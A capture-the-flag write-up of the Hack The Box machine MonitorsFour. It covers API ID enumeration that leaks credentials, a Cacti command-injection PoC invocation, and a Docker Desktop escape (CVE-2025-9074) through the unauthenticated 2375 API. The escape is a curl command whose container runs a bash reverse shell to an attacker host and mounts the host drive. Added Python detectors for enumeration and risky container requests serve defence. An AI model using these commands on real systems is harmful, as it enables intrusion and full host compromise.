MonitorsFour is an Active Directory machine on Hack The Box that features a vulnerable API endpoint leading to credential leakage, followed by an authenticated RCE in Cacti, and ultimately a full Docker escape via SSRF to achieve host compromise.
# Nmap 7.95 scan initiated Sat Dec 6 23:00:22 2025 as: /usr/lib/nmap/nmap --privileged -sVC -oN nmap/Monitor 10.10.11.98
Nmap scan report for monitorsfour.htb (10.10.11.98)
Host is up (0.14s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: 889DCABDC39A9126364F6A675AA4167D
|_http-title: MonitorsFour - Networking Solutions
| http-methods:
|_ Supported Methods: GET
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 6 23:01:07 2025 -- 1 IP address (1 host up) scanned in 45.70 seconds

echo -e '\n10.10.11.98 monitorsfour.htb cacti.monitorsfour.htb' | sudo tee -a /etc/hosts
The id parameter of /api/v1/user was vulnerable to enumeration because the endpoint required no authentication and used predictable, sequential IDs.
Impact: Enumeration → Credential leakage → Dashboard access.
Sensitive user data was exposed without token validation or rate limiting, enabling credential harvesting.
seq 1 100 > list
ffuf -u "https://monitorsfour.htb/api/v1/user?id=FUZZ&token=0" -w list -ac

# leaked user data
https://monitorsfour.htb/api/v1/user?id=2&token=0

username: admin password: wonderful1

the admin account's username is marcus
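From the defender's side, the enumeration above leaves a very recognisable trace: one client walking a numeric id on a single endpoint in a short window. The following detector is an added example written for this writeup, not code from the box or from any tool used on it. The nginx access-log lines are constructed (the 10.10.14.5 client mimics the ffuf run, the 192.168.1.20 client is ordinary traffic), and the thresholds (5 distinct ids within 60 seconds) are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse, parse_qs

# Constructed nginx access-log sample (not captured from the machine):
# one client sweeps /api/v1/user?id=N&token=0, one client browses normally.
SAMPLE_LOG = """\
10.10.14.5 - - [06/Dec/2025:23:05:01 +0000] "GET /api/v1/user?id=1&token=0 HTTP/1.1" 200 312
10.10.14.5 - - [06/Dec/2025:23:05:01 +0000] "GET /api/v1/user?id=2&token=0 HTTP/1.1" 200 340
10.10.14.5 - - [06/Dec/2025:23:05:02 +0000] "GET /api/v1/user?id=3&token=0 HTTP/1.1" 200 298
10.10.14.5 - - [06/Dec/2025:23:05:02 +0000] "GET /api/v1/user?id=4&token=0 HTTP/1.1" 404 51
10.10.14.5 - - [06/Dec/2025:23:05:03 +0000] "GET /api/v1/user?id=5&token=0 HTTP/1.1" 404 51
10.10.14.5 - - [06/Dec/2025:23:05:03 +0000] "GET /api/v1/user?id=6&token=0 HTTP/1.1" 404 51
192.168.1.20 - - [06/Dec/2025:23:05:10 +0000] "GET /index.php HTTP/1.1" 200 5120
192.168.1.20 - - [06/Dec/2025:23:05:40 +0000] "GET /api/v1/user?id=7&token=e3b0c442 HTTP/1.1" 200 330
"""

# Combined-log-format prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    url = urlparse(m['path'])
    return {
        'ip': m['ip'],
        'ts': ts,
        'path': url.path,
        'query': parse_qs(url.query),
        'status': int(m['status']),
    }


def detect_id_enumeration(log_text, endpoint='/api/v1/user', min_ids=5, window_s=60):
    """Return {client_ip: sorted ids} for clients that requested at least
    `min_ids` distinct numeric ids of `endpoint` within `window_s` seconds.
    Thresholds are assumptions; tune them against normal traffic."""
    hits = defaultdict(list)  # ip -> [(timestamp, id)]
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec or rec['path'] != endpoint:
            continue
        ids = rec['query'].get('id', [])
        if ids and ids[0].isdigit():
            hits[rec['ip']].append((rec['ts'], int(ids[0])))

    flagged = {}
    for ip, events in hits.items():
        events.sort()
        # Slide a time window over this client's requests; flag on the first
        # window that holds enough distinct ids.
        for i in range(len(events)):
            start = events[i][0]
            seen = {eid for ts, eid in events[i:]
                    if (ts - start).total_seconds() <= window_s}
            if len(seen) >= min_ids:
                flagged[ip] = sorted(seen)
                break
    return flagged


if __name__ == '__main__':
    for ip, ids in detect_id_enumeration(SAMPLE_LOG).items():
        print(f'{ip} enumerated ids {ids[0]}..{ids[-1]} ({len(ids)} distinct)')
```

The 404s are deliberately kept in the count: an enumerating client produces misses as well as hits, and the sweep is visible before any data leaks. The structural fix remains server-side (authenticate the endpoint, validate the token, do not expose sequential ids), but a rule like this gives the operations team a signal while that fix ships.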

Using leaked credentials, an attacker triggers a command-injection flaw in Cacti, gaining container-level execution.
login with username: marcus password: wonderful1

https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
python3 exploit.py -u <USERNAME> -p <PASSWORD> -i <ATTACKER-IP> -l <PORT> -url https://cacti.monitorsfour.htb

We see that the infrastructure was migrated to Windows and Docker Desktop 4.44.2.

A vulnerable application allowed Server-Side Request Forgery (SSRF) to reach the Docker Remote API exposed on localhost:2375 (HTTP, no authentication).
This API grants full control over Docker, enabling container creation, filesystem mounting, and arbitrary command execution.
Impact:
SSRF → Docker API access → Create container → Bind host filesystem → Execute reverse shell → Host compromise.
Exploit Chain:
cid=$(curl -s -X POST -H "Content-Type: application/json" \
  -d '{"Image":"docker_setup-nginx-php:latest","Cmd":["bash","-c","bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' \
  https://DOCKER_HOST:2375/containers/create | cut -d'"' -f4) \
  && curl -s -X POST https://DOCKER_HOST:2375/containers/$cid/start
Why it works:
The Docker daemon API (2375/tcp) is essentially a remote-root interface when exposed without TLS or authentication.
Through SSRF, the attacker reaches it indirectly and:
Severity: Critical — No user interaction required, leads to full system takeover.
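Two checks a defender would want against this chain, as an added example that is not part of the writeup or of Docker's own tooling. The first audits a dockerd daemon.json for a TCP listener without TLS (the `hosts` and `tlsverify` keys are real dockerd options; on Docker Desktop the equivalent is the GUI setting that exposes the daemon on localhost:2375). The second audits the JSON body of a POST /containers/create request, which an API gateway or admission hook in front of the daemon could apply, and flags the properties the exploit above relies on: a bind of the host root (`/` or `/mnt/host/<drive>`), plus privileged mode, the docker socket and a `/dev/tcp/` command. The request body is constructed to mirror the one in this writeup; the risk policy itself is an assumption.

```python
import json

# Constructed request body, mirroring the container-create call used above.
EXAMPLE_CREATE_BODY = json.loads(
    '{"Image":"docker_setup-nginx-php:latest",'
    '"Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.0.0/443 0>&1"],'
    '"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}'
)

# Constructed daemon.json fragments: one exposing the API in plaintext, one not.
EXPOSED_DAEMON_CFG = {"hosts": ["tcp://0.0.0.0:2375", "npipe://"]}
HARDENED_DAEMON_CFG = {"hosts": ["tcp://0.0.0.0:2376", "npipe://"], "tlsverify": True}


def is_host_root_bind(src):
    """True when the bind source hands out the whole host filesystem.
    /mnt/host/<drive> is how Docker Desktop on Windows exposes host drives
    inside its VM (assumption: treat every path under it as host root)."""
    src = src.rstrip('/') or '/'
    return src == '/' or src.startswith('/mnt/host')


def audit_daemon_config(cfg):
    """Flag every tcp:// listener in a dockerd config that lacks tlsverify."""
    findings = []
    for host in cfg.get('hosts', []):
        if host.startswith('tcp://') and not cfg.get('tlsverify'):
            findings.append(f'plaintext TCP API listener: {host}')
    return findings


def audit_create_request(body):
    """Return a list of findings for a /containers/create JSON body.
    Policy (assumption): host-root binds, docker.sock binds, privileged mode,
    host PID namespace and /dev/tcp/ commands are all high-risk."""
    findings = []
    hc = body.get('HostConfig') or {}
    for bind in hc.get('Binds') or []:
        src = bind.split(':', 1)[0]
        if is_host_root_bind(src):
            findings.append(f'host root mounted: {bind}')
        elif src.endswith('docker.sock'):
            findings.append(f'docker socket mounted: {bind}')
    if hc.get('Privileged'):
        findings.append('privileged container')
    if hc.get('PidMode') == 'host':
        findings.append('host PID namespace')
    if '/dev/tcp/' in ' '.join(body.get('Cmd') or []):
        findings.append('command opens a network connection via /dev/tcp')
    return findings


if __name__ == '__main__':
    for f in audit_daemon_config(EXPOSED_DAEMON_CFG):
        print('daemon:', f)
    for f in audit_create_request(EXAMPLE_CREATE_BODY):
        print('request:', f)
```

The daemon check only covers dockerd's own configuration; in the scenario above the API was reached from inside a container through SSRF, so the bind-mount audit is the control that would have caught the escape step regardless of how the listener was exposed. Running the request audit over Docker's event log or `docker inspect` output after the fact gives the same findings for containers already created.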
Docker Escape on Windows Docker Desktop CVE-2025-9074
cid=$(curl -s -X POST -H "Content-Type: application/json" \
  -d '{"Image":"docker_setup-nginx-php:latest","Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.0.0/443 0>&1"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' \
  https://192.168.65.7:2375/containers/create | cut -d'"' -f4) \
  && curl -s -X POST https://192.168.65.7:2375/containers/$cid/start
# root flag
cat /host_root/Users/Administrator/Desktop/root.txt
